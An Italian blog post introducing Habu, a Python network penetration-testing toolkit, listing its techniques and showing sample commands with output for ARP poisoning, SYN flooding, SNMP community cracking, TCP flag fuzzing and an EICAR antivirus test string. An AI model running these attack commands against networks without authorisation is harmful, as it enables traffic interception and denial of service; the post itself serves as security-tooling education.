Guida al GDPR Regolamento generale sulla protezione dei dati
21 marzo 2018
God of War 2018 – L’epico ritorno del guerriero Kratos per PS4
31 marzo 2018
Mostra tutti

Habu: Python Network Hacking e Penetration Toolkit

Habu: Python Network Hacking e Penetration Toolkit

Habu è un tool molto utile che ci viene in contro nei Penetration Test e nello svolgere attività di Ethical Hacking in ambito networking

Installazione di Habu Python Network Hacking e Penetration Toolkit

$ pip install habu

Alcune tecniche implementate nella versione corrente di Habu sono:

  • ARP Poisoning
  • ARP Sniffing
  • DHCP Discover
  • DHCP Starvation
  • LAND Attack
  • SNMP Cracking
  • SYN Flooding
  • TCP Flags Analysis
  • TCP ISN Analysis
  • TCP Port Scan
  • Web Techonologies Identification

Habu richiede:

  • Click
  • Python (3.x)
  • Scapy-Python3
  • Matplotlib

Alcuni comandi essenziali di Habu:

  • habu.arpoison:
    ARP Poisoning – Questo comando invia pacchetti ARP ‘is-at’ a ciascuna vittima, poisoning le tabelle ARP per inviare il traffico al sistema

    $ sudo habu.arpoison 192.168.1.5 192.168.1.6
    Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
    Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
    Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
    Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
    ...
  • habu.arpsniff
    scopre i dispositivi sulla tua LAN che catturano pacchetti ARP. Questo comando ascolta i pacchetti ARP e mostra le informazioni di ogni dispositivo.

    1   192.168.0.1         a4:08:f5:19:17:a4   Sagemcom Broadband SAS
    7   192.168.0.2         64:bc:0c:33:e5:57   LG Electronics (Mobile Communications)
    2   192.168.0.5         00:c2:c6:30:2c:58   Intel Corporate
    6   192.168.0.7         54:f2:01:db:35:58   Samsung Electronics Co.,Ltd
  • habu.contest
    Controlla le tue capacità di connessione. Questo comando cerca di connettersi a vari servizi e verificare se è possibile raggiungerli utilizzando la connessione Internet.

    $ habu.contest
    IP:    True
    DNS:   True
    FTP:   True
    SSH:   True
    HTTP:  True
    HTTPS: True
  • habu.dhcp_discover
    Scoprire i server DHCP

    $ sudo habu.dhcp_discover
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP
  • habu.eicar
    Visualizza la stringa di test EICAR che può essere utilizzata per testare i motori antimalware.

    $ habu.eicar
    X5O!P%@AP[4\XZP54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • habu.hasher
    Calcola varie hash con i dati di input appartenenti ad un file o uno stream.

    $ habu.hasher README.rst
    md5  :
    375375d9cfb2aacab7c8d1a9afd3d9b7
    sha1 :
    21c67b9ef44bc24d47eef6adab648ba34662927e
    $ cat README.rst |
    habu.hasher -
    md5  :
    375375d9cfb2aacab7c8d1a9afd3d9b7
    sha1 :
    21c67b9ef44bc24d47eef6adab648ba34662927e
    $ habu.hasher - <
    README.rst
    md5  :
    375375d9cfb2aacab7c8d1a9afd3d9b7
    sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e
  • habu.ip
    Viasualizza il tuo attuale IP pubblico corrente in base alla risposta da https://api.ipify.org.

    $ habu.ip
    182.26.32.***
  • habu.snmp_crack
    Questo comando lancia query snmp-get contro un IP. Il dizionario utilizzato è quello distribuito con lo strumento onesixtyone

    $ sudo habu.snmp_crack 179.125.234.210
    Community found: private
    Community found: public
  • habu.isn:
    Visualizza i numeri di sequenza TCP per un IP

    $ sudo habu.isn www.roccabalzama.it
    1962287220
    1800895007
    589617930
    3393793979
    469428558
  • habu.synflood
    Questo comando invia molte connessioni TCP e le mantiene aperte. Alcuni sistemi molto vecchi possono subire un diniego di notificazione o comunicazione

    $ sudo habu.synflood 172.16.0.10
    .................
  • habu.tcpflags
    TCP Flag Fuzzer. Questo comando invia pacchetti TCP con flag diversi e indica quali risposte riceve. Può essere usato per analizzare come le diverse implementazioni e configurazioni di stack TCP/IP rispondono ai pacchetti con varie combinazioni di flag.

    $ sudo habu.tcpflags www.roccobalzama.it
    S  ->
    SA
    FS ->
    SA
    FA ->
    R
    SA -> R
  • habu.ping
    Questo comando implementa il classico “ping” con richieste di eco ICMP

    $ sudo habu.ping 8.8.8.8
    IP / ICMP 8.8.8.8 >
    192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 >
    192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 >
    192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding

Tutti i comandi implementano l’opzione ‘-help’, che mostra la guida, gli argomenti, le opzioni e i valori predefiniti.
Quasi tutti i comandi implementano la modalità verbose con l’opzione ‘-v’. Questo può darvi qualche informazione in più su ciò che Habu sta facendo.

 

Valutazione Media
Last Reviewer
Reviewed Item
Habu: Python Network Hacking e Penetration Toolkit
Rating
51star1star1star1star1star
Rocco Balzamà

Rocco Balzamà

Admin & CEO Rocco Balzamà Studio & Agency at ErreBi Group S.r.l.
Ethical Hacker | Blogger | Developer | Graphic & Web Designer | Consulente d'Immagine | Social Media Marketing Manager | Copywriter | SEO Specialist | Digital Influencer | IT Cybersecurity Senior Manager
Rocco Balzamà
Rocco Balzamà
×
👩‍🏫 Benvenuto!!!
Come possiamo aiutarti....

Utilizziamo i cookie per offrirti la migliore esperienza online in conformità con la nostra privacy policy ed il Regolamento Europeo GDPR rispettando la tua privacy, ecco perchè ti diamo la possibilità di personalizzare la tua navigazione sul nostro sito.

Impostazioni

Quando visiti un sito Web, esso può archiviare o recuperare informazioni sul tuo browser, principalmente sotto forma di cookies. In linea con la direttiva EU GDPR 2016/679 puoi personalizzate la tua navigazione sul nostro sito in modo da tutelare la tua privacy.


  • UAZDY6TJisMf56cSs0lvBgp3LfIXVK7sZMYb9UBtilhtMVTNnXhUmOeKQvYTtm4dMZVN7w.

  • ads/user-lists/#

Rifiuta tutti i Servizi
Accetta tutti i Servizi